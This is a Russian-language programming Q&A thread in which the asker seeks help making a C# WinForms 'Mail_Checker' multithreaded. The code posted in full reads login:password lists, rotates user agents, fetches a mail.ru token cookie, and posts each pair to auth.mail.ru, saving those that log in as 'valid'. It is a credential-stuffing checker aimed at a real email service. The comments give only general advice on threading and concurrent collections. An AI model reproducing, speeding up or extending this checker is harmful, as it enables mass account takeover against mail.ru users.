# Покажите пример как переделать программу в многопоточную

Tags: c#, многопоточность

Привел полностью рабочий код программы, она проверяет на валидность аккаунты, покажите пример как переделать её, чтобы запустить проверку аккаунтов например в три или пять потоков одновременно, то есть сделать как у многих программ работу в потоках. Выдает ошибку Элемент с тем же ключом уже был добавлен, переменная s = 3, хотя на выходе из цикла s = 2; И подскажите как разделить данные, то есть например 10 аккаунтов и если я выбираю 2 потока, чтобы в каждом потоке нагрузка была по 5 аккаунтов.

```
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
using Leaf.xNet;
using System.Text.RegularExpressions;
using System.Collections.Concurrent;

namespace Mail_Checker
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
        ConcurrentDictionary<int, string> User_Agent = new ConcurrentDictionary<int, string>();
        ConcurrentDictionary<int, string> login = new ConcurrentDictionary<int, string>();
        ConcurrentDictionary<int, string> pass = new ConcurrentDictionary<int, string>();
        ConcurrentDictionary<int, string> token = new ConcurrentDictionary<int, string>();
        ConcurrentDictionary<int, string> Cookie = new ConcurrentDictionary<int, string>();
        bool proverka = true;
        string Save = "";
        int valid = 0;
        int s = 0;

        private void button4_Click(object sender, EventArgs e)
        {
            OpenFileDialog openFileDialog = new OpenFileDialog();
            openFileDialog.Filter = "txt files (*.txt)|*.txt|All files (*.*)|*.*";
            if (openFileDialog.ShowDialog() == DialogResult.OK)
            {
                textBox2.Text = File.ReadAllText(openFileDialog.FileName, Encoding.Default);
            }
        }
        private void button1_Click(object sender, EventArgs e)
        {
            OpenFileDialog openFileFialog = new OpenFileDialog();
            openFileFialog.Filter = "txt files (*.txt)|*.txt|All files (*.*)|*.*";
            if (openFileFialog.ShowDialog() == DialogResult.OK)
            {
                textBox1.Text = File.ReadAllText(openFileFialog.FileName, Encoding.Default);
            }
        }

        private void textBox1_TextChanged(object sender, EventArgs e)
        {
            label2.Text = textBox1.Lines.Length.ToString();
        }

        private void button2_Click(object sender, EventArgs e)
        {
            SaveFileDialog save = new SaveFileDialog();
            save.Filter = "txt files (*.txt)|*.txt|All files (*.*)|*.*";
            if (save.ShowDialog() == DialogResult.OK)
            {
                File.WriteAllText(save.FileName, Save);
            }
        }

        private void textBox2_TextChanged(object sender, EventArgs e)
        {
            label6.Text = textBox2.Lines.Length.ToString();
        }
        void Token()
        {
            proverka = true;
            try
            {
                Random rand = new Random();
                string[] user_agent = File.ReadAllLines("User_Agent.txt", Encoding.Default);
                User_Agent.TryAdd(s, user_agent[rand.Next(user_agent.Length)]);
                HttpRequest request = new HttpRequest();
                request.KeepAlive = true;
                request.UserAgent = User_Agent[s];
                request.Get("https://mail.ru/");
                Cookie.TryAdd(s, request.Cookies.GetCookieHeader("https://mail.ru/"));
                string[] act = Cookie[s].Split(';');
                token.TryAdd(s, act[0].Replace("act=", "").Replace("\"", ""));
            }   catch { proverka = false; Invoke((MethodInvoker)delegate { Log_Txt.AppendText(Environment.NewLine + "Ошибка"); }); }
        }
        void Auth()
        {
            Token();
            if (proverka == true)
            {
                HttpRequest request = new HttpRequest();
                request.UserAgent = User_Agent[s];
                request.AddHeader("Accept", "*/*");
                request.AddHeader("Accept-Language", "ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3");
                request.AddHeader("Content-type", "application/x-www-form-urlencoded");
                request.AddHeader("Origin", "https://mail.ru");
                request.AddHeader("DNT", "1");
                request.AddHeader("Referer", "https://mail.ru/");
                request.AddHeader("Cookie", Cookie[s]);
                request.AddHeader("Accept-Encoding", "gzip, deflate");
                request.KeepAlive = true;
                RequestParams param = new RequestParams();
                param["login"] = login[s]; //Данный ключ отсутствует в словаре. s = 3 в словаре хранитятся ключи 0, 1, 2
                param["password"] = pass[s];
                param["saveauth"] = "1";
                param["token"] = token[s];
                param["project"] = "e.mail.ru";
                param["_"] = "1590381268818";
                string response = request.Post("https://auth.mail.ru/jsapi/auth", param).ToString();
                if (response.Contains("\"status\":\"ok\""))
                {
                    Invoke((MethodInvoker)delegate { Log_Txt.AppendText(Environment.NewLine + login[s] + ":" + pass[s] + " Валидный"); });
                    Save += login[s] + ":" + pass[s] + Environment.NewLine;
                    valid++;
                    Invoke((MethodInvoker)delegate { label4.Text = valid.ToString(); });
                }
                if (response.Contains("\"status\":\"fail\""))
                {
                    Invoke((MethodInvoker)delegate { Log_Txt.AppendText(Environment.NewLine + login[s] + ":" + pass[s] + " Не валидный"); });
                }
            }
        }
        void Start()
        {
            Task[] tasks = new Task[3];
            for (s = 0; s < textBox1.Lines.Length; s++) //Кол-во итераций по окончанию s = 2
            {
                string[] l = textBox1.Lines[s].Split(':');
                login.TryAdd(s, l[0]);
                pass.TryAdd(s, l[1]);
                tasks[s] = new Task(() =>
                {
                    Auth();
                });
                tasks[s].Start();
            }
        }
        private void button3_Click(object sender, EventArgs e)
        {
            Start();
        }
    }
}
```

Comment: Вы ничего не сможете сделать, пока ваши методы используют одни и те же поля. Я бы вам сначала посоветовал выполнить рефакторинг, выделить ответственности в вашем коде, разделить ваш класс на несколько классов, убрать разделяемое состояние между функциями и тогда может уже думать о многопоточности.

Comment: Я пробовал использовать вместо string массивы и присваивать новые данные на каждый индекс, но выдавало ошибку null при переборе, хотя в отладчике показывало, что данные есть.  Если мне разделять на под классы, то некоторые функции именно либы придется делать статическими, не очень подход. Которую многопоточность у меня выходит сделать, но там гонка за данными, а ставить лок, это тоже самое что и перебор делать в приведенном коде. Почему и написал, может кто нибудь приведет пример потокобезопастной коллекции.

Comment: 1) Я не понял ваших проблем с рефакторингом. Статические методы\классы не обязательно использовать при разделении кода 2) Потокобезопасные коллекции существуют, например, ConcurrentBag. 3) Ваши проблемы с массивом мне тоде не понятны. Возможно, вам стоит показать пример вашего кода в вопросе.

Comment: Про потокобезопастные колекции читал, но запутался как правильно это всё написать, например Queue<T>  очередь вроде хорошо подходит для таких целей, кода с массивами больше нету, удалил.  Было что вроде этого string[] login; int _index; и использование login[_index] = "login";

Comment: `Queue<T>` не является потокобезопасной коллекцией. Вы скачете с темы на тему. Я вам точно говорю, вам надо начать с рефаторинга. Рефакторинг упростит код, а с простым кодом легче работать.

Comment: Переделал обратно код на массивы, изменил в вопросе код выдает ошибку индекс находится за пределами массивов когда у массива login индекс 1, а передаю login[0].

Comment: Классы ConcurrentQueue<T> и ConcurrentStack<T> не используют блокировку. Вместо этого они используют операции класса Interlocked для обеспечения потокобезопасности. взято с мсдн. Я не много не понимаю что вы имеете ввиду, под упростить код, я его легко читаю. А вот чтобы сделть многопоточность запутался в коллекциях и т.п... Можно пример как мне изменить код,чтобы заработало всё?  В примере с массивами по новому индексу должны храниться новые данные для аккаунтов, но ошибка почему то.

Comment: Вы понимаете, что во всех подобных строчках `string[] proxy = new string[_index2];` вы создаете массивы длиной 0? Вы знаете разницу между массивом и списком?

Comment: для вас все эти методы выглядят логично - потому что вы их писали. Для меня, как человека не знакомого даже с вашей задачей, ваш код выглядит как просто мешанина текста. Я четко вижу, что часть вашего кода делает запросы по сети. Почему бы эту часть, которую вы хотите распараллелить, не вынести в отдельный класс?

Comment: string[] proxy = new string[_index2]; при запуске размер индекса увеличивается, индекс = 1 то есть когда выдаёт ошибку у меня _index2 = 1, a proxy[_index]  = "что то там"; _index = 0.   То есть имеете ввиду все переменные и массивы вынести в отдельный класс? Я это представляю так, что данные также будут путаться. Суть вопроса в том что сделать многопоточность, то есть сейчас  у меня идет проверка в одном потоке, а для ускорения хочу добавить многопоточность, что бы проверка шла в 3-5 и т.п потоков.

Comment: Я пробовал через класс, но во всех методах данные используются почти одни и теже, каждый раз объявлять нужно и + если данные не берутся, а присваиваются в методе их нужно слать в класс, потом брать от туда в другой метод. У меня так не вышло, кода того тоже уже нету.  Если не сложно можно пример кода? У меня не выходит, запутался....

Comment: `string[] proxy = new string[_index2]; при запуске размер индекса увеличивается, индекс = 1 то есть когда выдаёт ошибку у меня _index2 = 1` это так не работает. Когда вы меняете переменную `_index2`, ваши массивы не обновляются, они как были созданы пустыми, так и остаются пустыми. У меня сейчас уже ночь, потому я не помогу вам с кодом.

Comment: Вот этого не знал, что массивы не обновляются, привык обычно с переменными работать, а тут таким способом захотел менять. Если сможете буду рад, любому примеру когда сможете подсказать. Пока что буду дальше в мсдн читать.

Comment: Обновил код  в вопросе

Comment: Вам необязательно копаться MSDN. Начните не с вопроса "почему не работает?", а с вопросов "как передать аргумент в Task?", как вернуть результат работы из задачи. Сфокусируйтесь на том, что нельзя обращаться к общим данным в задаче, старайтесь этого избежать. А вот где избежать не получится, уже думайте о конкурентных коллекциях и прочих прелестях синхронизации между потоками.

Comment: В  том и проблема, что это все общие данные, эти данные потоки должны использовать одновременно, поэтому добавил Dictionary так как там можно записывать данные с ключом, в данном случае использую переменную для индекса _index, то есть в каждом срабатывание цикла я записываю в словарь новые данные, но я получаю ошибку Элемент с тем же ключом уже был добавлен.

Comment: В коллекциях запутался, какую лучше выбрать, но эта показалась более подходящей так как вроде бы, при каждом срабатывание цикла и новом запуске потока, у меня новые данные с новым индексом, далее я их получаю с тем же индексом. Но не работает почему то.

Comment: Ищите про шаблон программирования Producer/Consumer, и возможно `BlockingCollection` вам поможет, или любая другая коллекция из `System.Collections.Concurrent`. Есть еще `Channel`, но там надо будет хорошо вникнуть и умело использовать `async/await`. А если отойти от конкуррентных коллекций, то можно использовать синхронизированный коллбэк, типа `IProgress<T>`. Ну и напомню, что в `Task` можно передать аргумент, и можно вернуть значение при использовании `Task<T>`. Инструментов куча, выбирайте любой, пробуйте.

Comment: @aepot Поищу, прочитал что я вообще словарь использую не тот, так как в коде вопроса, он не из конкурентной коллекции, буду пробовать, может что то получится)

Comment: Обновил код и вопрос